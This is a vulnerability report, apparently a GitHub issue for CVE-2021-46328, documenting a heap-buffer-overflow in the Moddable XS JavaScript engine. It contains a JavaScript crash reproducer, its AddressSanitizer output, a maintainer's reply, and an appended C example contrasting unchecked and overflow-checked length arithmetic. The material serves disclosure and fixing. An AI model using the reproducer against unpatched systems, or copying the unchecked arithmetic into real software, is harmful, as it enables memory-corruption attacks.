CVE-2021-46328: Heap-buffer-overflow in __libc_start_main · Issue #751 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via the component __libc_start_main.


Heap-buffer-overflow in __libc_start_main #751

Closed

hope-fly opened this issue Dec 14, 2021 · 1 comment

@hope-fly

Moddable-XS revision

Commit: db8f973
Version: 11.5.0 32 4

Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

```sh
cd ~/moddable/xs/makefiles/lin
make debug
```

Test case

```js
function JSEtest(x, n) {
    while (x.length < n) {
        x += x;
    }
    return x.substring(0, n);
}

var x = JSEtest("1", 1 << 20);
var rep = JSEtest("$1", 1 << 16);
var y = x.replace(/(.+)/g, rep);
y.length;
```

Execution & Output

```
$ ./xst test.js
=================================================================
ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f62dd0fe820 at pc 0x7f62e0bf477a bp 0x7ffd65c0fc60 sp 0x7ffd65c0f408
WRITE of size 1048576 at 0x7f62dd0fe820 thread T0
    #0 0x7f62e0bf4779  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79779)
    #1 0x564bd7f19243 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
    #2 0x564bd7f19243 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1989
    #3 0x564bd7e46db6 in fx_RegExp_prototype_replace /root/moddable/xs/sources/xsRegExp.c:834
    #4 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #5 0x564bd7f1c334 in fx_String_prototype_withRegexp /root/moddable/xs/sources/xsString.c:1675
    #6 0x564bd7f1c334 in fx_String_prototype_replace /root/moddable/xs/sources/xsString.c:1120
    #7 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #8 0x564bd7ebcc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #9 0x564bd80ce90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #10 0x564bd79f54c7 in main /root/moddable/xs/tools/xst.c:281
    #11 0x7f62e01eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #12 0x564bd79f70c9 in _start (/root/moddable/build/bin/lin/debug/xst+0x950c9)

0x7f62dd0fe820 is located 0 bytes to the right of 16777248-byte region [0x7f62dc0fe800,0x7f62dd0fe820)
allocated by thread T0 here:
    #0 0x7f62e0c59b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x564bd7d2fa66 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506
    #2 0x564bd7d630a3 in fxAllocate /root/moddable/xs/sources/xsMemory.c:170
    #3 0x564bd7a19d9a in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1367
    #4 0x564bd79f2ddf in main /root/moddable/xs/tools/xst.c:259
    #5 0x7f62e01eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79779)
Shadow bytes around the buggy address:
  0x0fecdba17cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fecdba17d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
```

Credits: Found by OWL337 team.

mkellner pushed a commit that referenced this issue on Dec 21, 2021

@phoddie (Collaborator) commented Dec 21, 2021

Nice find. We have eliminated several other integer overflow issues recently, but clearly overlooked this one.
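The reproducer above makes a regex capture of 2^20 characters and a replacement template of 2^15 `$1` references, so the expanded substitution would be 2^35 characters, while ASan reports a write of exactly one capture (1048576 bytes) just past the end of the 16 MB chunk heap; the maintainer's reply calls it an integer overflow. The following is an added example, not XS code from the project: a hypothetical expansion-length computation in unchecked 32-bit arithmetic beside an overflow-checked version, run with the report's sizes. The function names and the exact arithmetic are assumptions about the bug class, not the XS implementation.

```c
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

/* Hypothetical helper (not XS code): build "$1" repeated `pairs` times. */
static char *make_dollar_template(size_t pairs)
{
    char *t = malloc(pairs * 2 + 1);
    if (!t) return NULL;
    for (size_t i = 0; i < pairs; i++) { t[2 * i] = '$'; t[2 * i + 1] = '1'; }
    t[pairs * 2] = '\0';
    return t;
}

/* Unchecked: length of the expansion when every "$1" becomes a capture of
   cap_len characters. The 32-bit total wraps silently, so a caller would
   allocate a tiny buffer and then copy a full-size capture into it. */
static uint32_t expansion_len_unchecked(const char *tmpl, uint32_t cap_len)
{
    uint32_t total = 0;
    for (size_t i = 0; tmpl[i] != '\0'; i++) {
        if (tmpl[i] == '$' && tmpl[i + 1] == '1') { total += cap_len; i++; }
        else total += 1;
    }
    return total;
}

/* Checked: same arithmetic, but every addition is overflow-tested.
   Returns 0 and stores the length, or -1 if it would not fit in 32 bits. */
static int expansion_len_checked(const char *tmpl, uint32_t cap_len, uint32_t *out)
{
    uint32_t total = 0;
    for (size_t i = 0; tmpl[i] != '\0'; i++) {
        uint32_t add = 1;
        if (tmpl[i] == '$' && tmpl[i + 1] == '1') { add = cap_len; i++; }
        if (__builtin_add_overflow(total, add, &total)) return -1;
    }
    *out = total;
    return 0;
}

int main(void)
{
    /* The report's sizes: a 2^20-character capture, 2^15 "$1" references. */
    char *t = make_dollar_template(1u << 15);
    if (!t) return 1;
    uint32_t ok, wrapped = expansion_len_unchecked(t, 1u << 20);
    int rc = expansion_len_checked(t, 1u << 20, &ok);
    printf("unchecked: %u (wrapped), checked rc=%d\n", wrapped, rc);
    free(t);
    return 0;
}
```

With these inputs the unchecked total is 2^35 mod 2^32, i.e. 0, which is the kind of undersized allocation that turns the first 1 MB copy into the out-of-bounds write ASan reports; the checked version refuses before any allocation happens.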

